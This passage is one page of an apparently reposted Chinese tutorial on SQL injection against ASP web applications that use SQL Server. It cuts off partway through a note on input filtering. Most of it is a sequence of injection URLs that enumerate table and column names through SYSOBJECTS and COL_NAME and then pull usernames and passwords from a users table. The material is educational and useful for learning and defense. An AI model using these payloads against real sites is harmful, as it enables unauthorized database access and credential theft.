打印本文 打印本文 关闭窗口 关闭窗口
基于SQL Server的WEB应用程序注入攻击详细介绍
作者:武汉SEO闵涛  文章来源:敏韬网  点击数11367  更新时间:2007/11/14 11:56:57  文章录入:mintao  责任编辑:mintao
称:

article_show.asp?ID=(SELECT TOP 1 NAME FROM SYSOBJECTS WHERE XTYPE=''''U'''' AND STATUS>0 AND NAME NOT IN(''''''''))

得到第一个表名为info_files后,用下面语句得到第二个表名:

article_show.asp?ID=(SELECT TOP 1 NAME FROM SYSOBJECTS WHERE XTYPE=''''U'''' AND STATUS>0 AND NAME NOT IN(''''info_files''''))

得到第二个表名为info_articles后,用下面语句得到第三个表名:

article_show.asp?ID=(SELECT TOP 1 NAME FROM SYSOBJECTS WHERE XTYPE=''''U'''' AND STATUS>0 AND NAME NOT IN(''''info_files'''',''''info_articles''''))

假设得到第三个表名为info_users

使用下面语句得到info_users表中第一个字段的名称:

article_show.asp?ID=(SELECT COL_NAME(OBJECT_ID(''''info_users''''),1)

使用下面语句得到info_users表中第二个字段名称:

article_show.asp?ID=(SELECT COL_NAME(OBJECT_ID(''''info_users''''),2)

假设得到info_users表的结构为ID,username,password,那么,使用下面的语句得到第一个记录的username值:

article_show.asp?ID=(SELECT TOP 1 username FROM info_users)

使用下面语句得到第一个记录的password值:

article_show.asp?ID=(SELECT TOP 1 password FROM info_users)

使用下面的语句得到第一个记录的ID值:

article_show.asp?ID=(SELECT TOP 1 CHAR(115) %2B CAST(ID AS VARCHAR(2)) FROM info_users)

 

六、附加说明

    也有很多开发者用过滤

上一页  [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]  ...  下一页 >> 

打印本文 打印本文 关闭窗口 关闭窗口